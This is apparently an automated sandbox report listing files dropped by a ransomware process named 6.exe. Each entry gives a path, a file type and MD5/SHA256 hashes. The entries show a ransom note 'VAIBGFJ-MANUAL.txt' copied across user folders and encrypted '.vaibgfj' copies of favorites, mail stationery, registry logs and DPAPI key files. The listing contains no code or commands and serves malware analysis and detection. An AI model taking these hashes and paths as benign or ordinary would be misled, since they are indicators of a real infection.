C:\Users\Administrator\Searches\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\Saved Games\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\ntuser.ini.vaibgfj
binary
MD5: 1967e416a94f3bb72238942d9949d818
SHA256: a36a593dd1a4d7146e258066d9ffec8f4d162cd475b227e912e90dbe65c7d608
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\ntuser.ini
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms.vaibgfj
binary
MD5: 55b9cd412037f114fae867ee79b95f5e
SHA256: 293c4337ffdcf5330a47c6084903a8c0153ae3d4bb05f46f7cb6f264fcce34b6
3020
6.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms.vaibgfj
binary
MD5: c8f859a93e35194342d82589080a371a
SHA256: 0887203f851d8f19f3e811fd86c319ae48e2147d9e0c4b515ae5af973a79e5af
3020
6.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf.vaibgfj
binary
MD5: 28373d88220fa69b480710858d99092d
SHA256: be1f6810f0fa16ecbbb552f9f5137d780e6b3155eb953aac786a57f39e2edf15
3020
6.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\ntuser.dat.LOG1.vaibgfj
binary
MD5: a106b986a0c071deb6da12dca040d81c
SHA256: 1acddede34fb669696915c2e7a87c4784645ab30faa29a10d7dcf14fc0da365b
3020
6.exe
C:\Users\Administrator\ntuser.dat.LOG1
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Spaces.url.vaibgfj
binary
MD5: 1f699cc5122c5b306322b5ffcbd3869f
SHA256: eda43db1ab04eb3b04e8c38348d3ece48c481819c5d430660420c0bb68871974
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Network Shortcuts\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\Links\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Spaces.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Mail.url.vaibgfj
binary
MD5: d485306509b532133e5adeeca4393c4c
SHA256: 7379629dfa1210ed46e8679273178eba629fe9e3fe1e6099fc22185d958be605
3020
6.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Mail.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Gallery.url.vaibgfj
binary
MD5: 8780603280c1f1633456c0bf4dd8200e
SHA256: 651d88ca135af0d67ce2149efd0498a8bbb5b7340086d9da96b0b0557e8ed0c1
3020
6.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Gallery.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\Favorites\Windows Live\Get Windows Live.url.vaibgfj
binary
MD5: 175218b6b328e00a7a8c756a7f0e6449
SHA256: e862037fac9dfd8e4ebf25f72919218b9912eb147f55892db9292a5dcfdf8a0f
3020
6.exe
C:\Users\Administrator\Favorites\Windows Live\Get Windows Live.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\Favorites\Windows Live\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSNBC News.url.vaibgfj
binary
MD5: 087f7bba6880d8669cad45ccd7ce38aa
SHA256: a134842c13b18f9823c91d7d5973c659b5c3f5b6625a8835712c097bc41d50da
3020
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSNBC News.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN.url.vaibgfj
binary
MD5: 0b80a40028f6d140745e6a6fadd325bf
SHA256: 281c1b8e084de77d2f148377bed9e1bf877da9b134bc6984574e06a7c963ad35
3020
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Sports.url.vaibgfj
binary
MD5: b9566eb45ab66e246792bcebe40145ab
SHA256: 74a7e86a658e77ca9079c0c480af10fc2043d4bfa99c0d61da772025af21f989
3020
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Sports.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Money.url.vaibgfj
binary
MD5: a0ed907d448ec214a7d4dd31f6d637f4
SHA256: fbdbcf41f9e7a26f582624ce100fa695d3eb410a859972b691dd9dcb6fa01b69
3020
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Money.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Entertainment.url.vaibgfj
binary
MD5: 4c7c15808e5a629f074d649dd0153a7d
SHA256: b0d4b9ca8e9d85dbc892e3930a871948769830e07c1155497683dda69df8ce7c
3020
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Entertainment.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Autos.url.vaibgfj
binary
MD5: 3adfb09a6de899d1e077338db1be0fef
SHA256: 045f3734338bf921881ab27ec82f517fb5fbccb10077f342efc8ea65b7ca378d
3020
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Autos.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft Store.url.vaibgfj
binary
MD5: 7f315fbb81ad9b063f4ee05b839ddd75
SHA256: 3364420ca771589bc02b4ef745c8c32e34fa8b95246d62f882d970502a1e5788
3020
6.exe
C:\Users\Administrator\Favorites\MSN Websites\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft Store.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft At Work.url.vaibgfj
binary
MD5: a1e20328b2651607775afe871d98c306
SHA256: c9186584322f119195384c49ed6f8363dbb0c5732f8d4eed3a445f7b1eaf1e97
3020
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft At Work.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft At Home.url.vaibgfj
binary
MD5: ce69b792ddf8c2c7396b2a161bcd921f
SHA256: 499707ea2587a3fdc8c9286a33ddd33fbc7e85e757a1a4e6b3ba3c1c8cb05923
3020
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft At Home.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\IE site on Microsoft.com.url.vaibgfj
binary
MD5: 92c9143cbdfefb6492b75dba3b1884d4
SHA256: 86d50b0ff5d17028279e1a00df36f5614ec927e3c9543d624b37e3c220e79c76
3020
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\IE site on Microsoft.com.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\IE Add-on site.url.vaibgfj
binary
MD5: e74dc5bd6f787d98b7a4382d2bc64bf8
SHA256: d00028500bb53ef3f3385b899de38593e80e1fc53310694b8285da23635a6efb
3020
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\IE Add-on site.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\Favorites\Links for United States\USA.gov.url.vaibgfj
binary
MD5: c1ed5ebc30b6d3cf1bfb73ea41689e87
SHA256: 9c7706d7528ffa133f108864bdba505cce05b75e6bac0dfe4023dac3bd3424c2
3020
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\Favorites\Links for United States\USA.gov.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\Favorites\Links for United States\GobiernoUSA.gov.url.vaibgfj
binary
MD5: 62f0623fb6f8a6d2566132ea706c6aac
SHA256: 262ae63a42da9557a91454caddf19a7eb1b6e4da84b18fb69cf1684763aa6a2f
3020
6.exe
C:\Users\Administrator\Favorites\Links for United States\GobiernoUSA.gov.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\Favorites\Links for United States\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\Favorites\Links\Web Slice Gallery.url.vaibgfj
binary
MD5: 3614834f5d505f97d73a0124b228e45a
SHA256: 418bcfe27dcaec2ca38755b62211171b42bcad4e392d7c33998147afe1ca8791
3020
6.exe
C:\Users\Administrator\Favorites\Links\Web Slice Gallery.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\Favorites\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\Videos\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\Favorites\Links\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\Pictures\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\Downloads\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\Music\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\Desktop\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\Documents\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\Contacts\Administrator.contact.vaibgfj
binary
MD5: 4c8d4f74a43af0ddcca88b65943b5feb
SHA256: 96cb2ebd133d7a3572182ed6204c291418e8850eaa3375a44471954a889f948e
3020
6.exe
C:\Users\Administrator\Contacts\Administrator.contact
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\Contacts\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\Preferred.vaibgfj
binary
MD5: d142c9ad53ccc0e8d60be753335511d7
SHA256: a99b525aa1ea9ab28ab169e3beb071866ebe052d0e22911d6d969e809ceea362
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\Preferred
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\e772058d-056e-4021-b783-db194666b156.vaibgfj
binary
MD5: 965dda6a8f5422241a8dc71b30b30971
SHA256: 24a31fb2aaed01fc029b48143fdcbbcd986ae4260203237c4bfb3c155bc08d29
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\e772058d-056e-4021-b783-db194666b156
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\CREDHIST.vaibgfj
binary
MD5: 5fb450712580fff78a9ec0973ec818c8
SHA256: 4d2948202c92b194c1aa5fbcb34ed973f2ee7f64faefcf8bef3551366ffade63
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\CREDHIST
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Credentials\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Temp\WPDNSE\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Roaming\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Identities\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Identities\{BA2162A3-2F32-4850-8D8C-B3C9A2AA9D43}\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Temp\wmsetup.log.vaibgfj
binary
MD5: 358b2c973514c7e44821cdeb306502c0
SHA256: 5e6dceffaf4220f6610bd50e14142f3b66461f41b80d37fac734e70107f66800
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Media Center Programs\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\LocalLow\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Temp\wmsetup.log
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Temp\Administrator.bmp.vaibgfj
binary
MD5: 1b0adec1e24269d0ce5d9b80963053db
SHA256: fc7fb185acf23f6f600fa80ad60caf4de6c788170977fb459bafb3ef1cbdfcb9
3020
6.exe
C:\Users\Administrator\AppData\Local\Temp\Low\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Temp\Administrator.bmp
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Temp\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Sidebar\Settings.ini.vaibgfj
binary
MD5: 639014541ddd331e6a45664bf8f24557
SHA256: 737a23c2122f51afc231727b1be8cf245e2379d8f1c5dee980110372cada8a36
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Sidebar\Settings.ini
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Sidebar\Gadgets\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Sidebar\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.vaibgfj
binary
MD5: 07923c2ae45dffbb9cb2d4ce99151119
SHA256: b0062bee9d5b5b48f4333193d6a21563c1e2279be79a2ada329d7e419b30a966
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD.vaibgfj
binary
MD5: e71d420116ed64d9c924dfba7075f19e
SHA256: e4382b9ee8e2943ec589f4f8614c4f1e547ac75663d95dd7b652311b66c77ea4
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat.vaibgfj
binary
MD5: ad5bc3f623a7439563b778300bb96a1c
SHA256: 87d2808c422ea7c781acdce08590a04cd59d942db4f0bb0a621c6c55a10992bd
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore.vaibgfj
binary
MD5: b8553e1e1f2d55504c8bc13d9f241000
SHA256: 6bbd08ca4e947e827d58e2249e7dd54e61b4d63c691d14901c4c19d9c871f67c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Wrinkled_Paper.gif.vaibgfj
binary
MD5: 957a34b3a295382269ebae84be8ec703
SHA256: 1b0e3a222f624fb4a25b6c248b91cc1997645ebf9159f739576c5da616945f1a
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Wrinkled_Paper.gif
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg.vaibgfj
fli
MD5: 721e6feccf0c171ab2f19b763885370a
SHA256: 098a5674f68e72244261274432b09a510f2e361f87d81e1d07bd2fbc89376ee4
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\To_Do_List.emf.vaibgfj
binary
MD5: 3bc68524ef9ba54719bcc5a25bd77ac5
SHA256: 7654eabc3a4403bd5332a528d3577da51bd9fe2351c2fbf2518bd5b51b9fc0f9
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\To_Do_List.emf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tiki.gif.vaibgfj
binary
MD5: 06dd111c6264856c7a130f2ef9f2ee1c
SHA256: a0e0193dd508354add2a6617251553d86f6f5e674b64e0256a9b4da85cc02082
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tiki.gif
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg.vaibgfj
binary
MD5: a42540068d484221c20004908a5d5075
SHA256: 4e4a1f72ef1f974978545e4ce214cf2768f941db8c55c0af350f386ff0c15074
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stucco.gif.vaibgfj
binary
MD5: 6ba78ef458d5af1aedbeddb4b676a81e
SHA256: ea6e355257075c1b37f3361b54fd7ea7e140ffe6a228cfb4ae9f9ed8365df4a3
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stucco.gif
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.vaibgfj
binary
MD5: e8cb580e852f1a6ec184ebc733e10a59
SHA256: b4bafc4a60c2403031655caf0c02c4b2b48cb718abcc8b13d2a77c2956d1eec1
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm.vaibgfj
binary
MD5: 8df4fa54a7ba16d9932efc979a78a871
SHA256: 53b5fbec70530209f29aeec857b070916f4c732decb8e9770b9d2cc3d04f5474
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.vaibgfj
binary
MD5: e3a7413d7f977cb58d91e50fdf180e15
SHA256: b372affff3eea765d91d223e94bcb85b2ccf762e5efe5dc0b6e70faf9ca74e48
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm.vaibgfj
binary
MD5: 456e2b54ce75108fd2875150f6c6cd57
SHA256: 19431612eaec5ed3c742e086d1c0c4a34298c651c4b7b7cb86204c63be11b5fe
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg.vaibgfj
binary
MD5: 19a55e0f58a529e1e0e948aa8f92e665
SHA256: 926050ad7874ffea89027238a3d843e844a3c1aef9d2a9c22cc2211398df7266
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Shorthand.emf.vaibgfj
binary
MD5: c89349acd23c6afe49c7d1c5b55a5777
SHA256: 3084679cce4df87aef9270532ce0694cf6ab57262c058c17e9d577a7a70e37ca
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Shorthand.emf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.vaibgfj
binary
MD5: 1c3c476f67aee9807bd968aacafdeb50
SHA256: 445ebab09da4d2a43b6ba691aa509d7bb078a8b99d0f9dc397b5804da4c89a71
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm.vaibgfj
binary
MD5: f641c5de458f6116706043e61216cd6a
SHA256: 0486ac1d9994ffbaa0c48c56be278a00f61451bf4c98a286e0b08fcc9fa8e19e
3020
6.exe
